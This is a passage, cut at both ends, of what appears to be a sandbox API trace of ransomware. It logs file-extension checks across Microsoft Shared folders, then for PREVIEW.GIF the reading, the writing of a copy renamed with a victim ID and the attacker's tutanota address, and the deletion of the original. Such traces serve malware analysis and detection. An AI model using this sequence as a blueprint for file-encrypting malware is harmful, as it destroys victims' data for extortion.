Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0041.603] lstrlenW (lpString=".doc") returned 4 [0041.603] lstrcmpiW (lpString1=".doc", lpString2=".XSL") returned -1 [0041.604] lstrlenW (lpString=".docx") returned 5 [0041.604] lstrcmpiW (lpString1=".docx", lpString2="A.XSL") returned -1 [0041.604] lstrlenW (lpString=".pdf") returned 4 [0041.604] lstrcmpiW (lpString1=".pdf", lpString2=".XSL") returned -1 [0041.604] lstrlenW (lpString=".xls") returned 4 [0041.604] lstrcmpiW (lpString1=".xls", lpString2=".XSL") returned -1 [0041.604] lstrlenW (lpString=".xlsx") returned 5 [0041.604] lstrcmpiW (lpString1=".xlsx", lpString2="A.XSL") returned -1 [0041.604] lstrlenW (lpString=".ppt") returned 4 [0041.604] lstrcmpiW (lpString1=".ppt", lpString2=".XSL") returned -1 [0041.604] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0041.604] lstrlenW (lpString=".zip") returned 4 [0041.604] lstrcmpiW (lpString1=".zip", lpString2=".XSL") returned 1 [0041.604] lstrlenW (lpString=".rar") returned 4 [0041.604] lstrcmpiW (lpString1=".rar", lpString2=".XSL") returned -1 [0041.604] lstrlenW (lpString=".bz2") returned 4 [0041.604] lstrcmpiW (lpString1=".bz2", lpString2=".XSL") returned -1 [0041.604] lstrlenW (lpString=".7z") returned 3 [0041.604] lstrcmpiW (lpString1=".7z", lpString2="XSL") returned -1 [0041.604] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0041.604] lstrlenW (lpString=".dbf") returned 4 [0041.604] lstrcmpiW (lpString1=".dbf", lpString2=".XSL") returned -1 [0041.604] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0041.895] lstrlenW (lpString=".1cd") returned 4 [0041.895] lstrcmpiW (lpString1=".1cd", lpString2=".XSL") returned -1 [0041.895] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0041.895] lstrlenW (lpString=".jpg") returned 4 [0041.896] lstrcmpiW (lpString1=".jpg", lpString2=".XSL") returned -1 [0041.896] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0041.896] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0041.896] lstrlenW (lpString=".doc") returned 4 [0041.896] lstrcmpiW (lpString1=".doc", lpString2=".XSL") returned -1 [0041.896] lstrlenW (lpString=".docx") returned 5 [0041.896] lstrcmpiW (lpString1=".docx", lpString2="A.XSL") returned -1 [0041.896] lstrlenW (lpString=".pdf") returned 4 [0041.896] lstrcmpiW (lpString1=".pdf", lpString2=".XSL") returned -1 [0041.896] lstrlenW (lpString=".xls") returned 4 [0041.896] lstrcmpiW (lpString1=".xls", lpString2=".XSL") returned -1 [0041.896] lstrlenW (lpString=".xlsx") returned 5 [0041.896] lstrcmpiW (lpString1=".xlsx", lpString2="A.XSL") returned -1 [0041.896] lstrlenW (lpString=".ppt") returned 4 [0041.896] lstrcmpiW (lpString1=".ppt", lpString2=".XSL") returned -1 [0041.896] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0041.896] lstrlenW (lpString=".zip") returned 4 [0041.896] lstrcmpiW (lpString1=".zip", lpString2=".XSL") returned 1 [0041.896] lstrlenW (lpString=".rar") returned 4 [0041.896] lstrcmpiW (lpString1=".rar", lpString2=".XSL") returned -1 [0041.896] lstrlenW (lpString=".bz2") returned 4 [0041.896] lstrcmpiW (lpString1=".bz2", lpString2=".XSL") returned -1 [0041.896] lstrlenW (lpString=".7z") returned 3 [0041.896] lstrcmpiW (lpString1=".7z", lpString2="XSL") returned -1 [0041.896] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0041.896] lstrlenW (lpString=".dbf") returned 4 [0041.896] lstrcmpiW (lpString1=".dbf", lpString2=".XSL") returned -1 [0041.896] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0041.896] lstrlenW (lpString=".1cd") returned 4 [0041.896] lstrcmpiW (lpString1=".1cd", lpString2=".XSL") returned -1 [0041.896] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0041.896] lstrlenW (lpString=".jpg") returned 4 [0041.896] lstrcmpiW (lpString1=".jpg", lpString2=".XSL") returned -1 [0041.897] lstrcmpiW (lpString1=".jpg", lpString2=".USA") returned -1 [0041.897] lstrlenW (lpString="Bears.jpg") returned 9 [0041.897] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0042.736] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=1074) returned 1 [0042.736] CloseHandle (hObject=0x200) returned 1 [0042.736] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg")) returned 0x20 [0042.736] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0042.736] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.736] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0042.736] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0042.736] lstrlenW (lpString=".doc") returned 4 [0042.736] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0042.736] lstrlenW (lpString=".docx") returned 5 [0042.736] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0042.736] lstrlenW (lpString=".pdf") returned 4 [0042.737] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0042.737] lstrlenW (lpString=".xls") returned 4 [0042.737] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0042.737] lstrlenW (lpString=".xlsx") returned 5 [0042.737] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0042.737] lstrlenW (lpString=".ppt") returned 4 [0042.737] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0042.737] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0042.737] lstrlenW (lpString=".zip") returned 4 [0042.737] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0042.737] lstrlenW (lpString=".rar") returned 4 [0042.737] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0042.737] lstrlenW (lpString=".bz2") returned 4 [0042.737] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0042.737] lstrlenW (lpString=".7z") returned 3 [0042.737] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0042.737] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0042.737] lstrlenW (lpString=".dbf") returned 4 [0042.737] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0042.737] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0042.737] lstrlenW (lpString=".1cd") returned 4 [0042.737] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0042.737] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0042.737] lstrlenW (lpString=".jpg") returned 4 [0042.737] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0042.737] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0042.737] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0042.737] lstrlenW (lpString=".doc") returned 4 [0042.737] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0042.737] lstrlenW (lpString=".docx") returned 5 [0042.737] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0042.737] lstrlenW (lpString=".pdf") returned 4 [0042.737] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0042.737] lstrlenW (lpString=".xls") returned 4 [0042.738] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0042.738] lstrlenW (lpString=".xlsx") returned 5 [0042.738] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0042.738] lstrlenW (lpString=".ppt") returned 4 [0042.738] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0042.738] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0042.738] lstrlenW (lpString=".zip") returned 4 [0042.738] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0042.738] lstrlenW (lpString=".rar") returned 4 [0042.738] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0042.738] lstrlenW (lpString=".bz2") returned 4 [0042.738] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0042.738] lstrlenW (lpString=".7z") returned 3 [0042.738] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0042.738] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0042.738] lstrlenW (lpString=".dbf") returned 4 [0042.738] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0042.738] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0042.738] lstrlenW (lpString=".1cd") returned 4 [0042.738] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0042.738] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0042.738] lstrlenW (lpString=".jpg") returned 4 [0042.738] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0042.738] lstrcmpiW (lpString1=".emf", lpString2=".USA") returned -1 [0042.738] lstrlenW (lpString="Genko_2.emf") returned 11 [0042.738] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_2.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0042.739] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=10340) returned 1 [0042.739] CloseHandle (hObject=0x200) returned 1 [0042.739] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_2.emf")) returned 0x20 [0042.739] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_2.emf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0042.739] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_2.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.739] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.739] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.739] lstrlenW (lpString=".doc") returned 4 [0042.739] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0042.739] lstrlenW (lpString=".docx") returned 5 [0042.739] lstrcmpiW (lpString1=".docx", lpString2="2.emf") returned -1 [0042.739] lstrlenW (lpString=".pdf") returned 4 [0042.739] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0042.739] lstrlenW (lpString=".xls") returned 4 [0042.739] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0042.739] lstrlenW (lpString=".xlsx") returned 5 [0042.739] lstrcmpiW (lpString1=".xlsx", lpString2="2.emf") returned -1 [0042.739] lstrlenW (lpString=".ppt") returned 4 [0042.739] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0042.739] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.739] lstrlenW (lpString=".zip") returned 4 [0042.739] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0042.739] lstrlenW (lpString=".rar") returned 4 [0042.739] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0042.739] lstrlenW (lpString=".bz2") returned 4 [0042.739] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0042.740] lstrlenW (lpString=".7z") returned 3 [0042.740] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0042.740] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.740] lstrlenW (lpString=".dbf") returned 4 [0042.740] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0042.740] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.740] lstrlenW (lpString=".1cd") returned 4 [0042.740] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0042.740] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.740] lstrlenW (lpString=".jpg") returned 4 [0042.740] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0042.740] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.740] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.740] lstrlenW (lpString=".doc") returned 4 [0042.740] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0042.740] lstrlenW (lpString=".docx") returned 5 [0042.740] lstrcmpiW (lpString1=".docx", lpString2="2.emf") returned -1 [0042.740] lstrlenW (lpString=".pdf") returned 4 [0042.740] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0042.740] lstrlenW (lpString=".xls") returned 4 [0042.740] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0042.740] lstrlenW (lpString=".xlsx") returned 5 [0042.740] lstrcmpiW (lpString1=".xlsx", lpString2="2.emf") returned -1 [0042.740] lstrlenW (lpString=".ppt") returned 4 [0042.740] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0042.740] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.740] lstrlenW (lpString=".zip") returned 4 [0042.740] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0042.740] lstrlenW (lpString=".rar") returned 4 [0042.740] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0042.740] lstrlenW (lpString=".bz2") returned 4 [0042.740] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0042.740] lstrlenW (lpString=".7z") returned 3 [0042.740] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0042.741] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.741] lstrlenW (lpString=".dbf") returned 4 [0042.741] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0042.741] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.741] lstrlenW (lpString=".1cd") returned 4 [0042.741] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0042.741] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.741] lstrlenW (lpString=".jpg") returned 4 [0042.741] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0042.741] lstrcmpiW (lpString1=".emf", lpString2=".USA") returned -1 [0042.741] lstrlenW (lpString="Graph.emf") returned 9 [0042.741] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\graph.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0042.937] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=116724) returned 1 [0042.937] CloseHandle (hObject=0x208) returned 1 [0042.937] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\graph.emf")) returned 0x20 [0042.937] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\graph.emf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0042.937] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\graph.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.937] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0042.937] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0042.937] lstrlenW (lpString=".doc") returned 4 [0042.937] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0042.937] lstrlenW (lpString=".docx") returned 5 [0042.937] lstrcmpiW (lpString1=".docx", lpString2="h.emf") returned -1 [0042.938] lstrlenW (lpString=".pdf") returned 4 [0042.938] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0042.938] lstrlenW (lpString=".xls") returned 4 [0042.938] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0042.938] lstrlenW (lpString=".xlsx") returned 5 [0042.938] lstrcmpiW (lpString1=".xlsx", lpString2="h.emf") returned -1 [0042.938] lstrlenW (lpString=".ppt") returned 4 [0042.938] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0042.938] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0042.938] lstrlenW (lpString=".zip") returned 4 [0042.938] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0042.938] lstrlenW (lpString=".rar") returned 4 [0042.938] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0042.938] lstrlenW (lpString=".bz2") returned 4 [0042.938] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0042.938] lstrlenW (lpString=".7z") returned 3 [0042.938] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0042.938] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0042.938] lstrlenW (lpString=".dbf") returned 4 [0042.938] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0042.938] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0042.938] lstrlenW (lpString=".1cd") returned 4 [0042.938] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0042.938] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0042.938] lstrlenW (lpString=".jpg") returned 4 [0042.938] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0042.938] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0042.938] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0042.938] lstrlenW (lpString=".doc") returned 4 [0042.938] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0042.938] lstrlenW (lpString=".docx") returned 5 [0042.938] lstrcmpiW (lpString1=".docx", lpString2="h.emf") returned -1 [0042.938] lstrlenW (lpString=".pdf") returned 4 [0042.938] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0042.938] lstrlenW (lpString=".xls") returned 4 [0042.939] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0042.939] lstrlenW (lpString=".xlsx") returned 5 [0042.939] lstrcmpiW (lpString1=".xlsx", lpString2="h.emf") returned -1 [0042.939] lstrlenW (lpString=".ppt") returned 4 [0042.939] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0042.939] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0042.939] lstrlenW (lpString=".zip") returned 4 [0042.939] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0042.939] lstrlenW (lpString=".rar") returned 4 [0042.939] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0042.939] lstrlenW (lpString=".bz2") returned 4 [0042.939] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0042.939] lstrlenW (lpString=".7z") returned 3 [0042.939] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0042.939] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0042.939] lstrlenW (lpString=".dbf") returned 4 [0042.939] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0042.939] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0042.939] lstrlenW (lpString=".1cd") returned 4 [0042.939] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0042.939] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0042.939] lstrlenW (lpString=".jpg") returned 4 [0042.939] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0042.939] lstrcmpiW (lpString1=".GIF", lpString2=".USA") returned -1 [0042.939] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0042.939] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0043.060] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=2848) returned 1 [0043.060] CloseHandle (hObject=0x200) returned 1 [0043.061] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\preview.gif")) returned 0x20 [0043.061] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0043.061] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0043.061] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0043.061] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0043.061] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0043.508] GetLastError () returned 0x0 [0043.508] ReadFile (in: hFile=0x200, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0xb20, lpOverlapped=0x0) returned 1 [0043.521] WriteFile (in: hFile=0x1f0, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xb30, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xb30, lpOverlapped=0x0) returned 1 [0043.522] ReadFile (in: hFile=0x200, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0043.522] WriteFile (in: hFile=0x1f0, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xea, lpOverlapped=0x0) returned 1 [0043.522] SetEndOfFile (hFile=0x1f0) returned 1 [0043.522] CloseHandle (hObject=0x1f0) returned 1 [0043.523] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0043.523] SetEndOfFile (hFile=0x200) returned 1 [0043.524] CloseHandle (hObject=0x200) returned 1 [0043.524] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0043.524] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\preview.gif")) returned 1 [0043.524] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0043.524] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0043.524] lstrlenW (lpString=".doc") returned 4 [0043.524] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.524] lstrlenW (lpString=".docx") returned 5 [0043.524] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.524] lstrlenW (lpString=".pdf") returned 4 [0043.525] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.525] lstrlenW 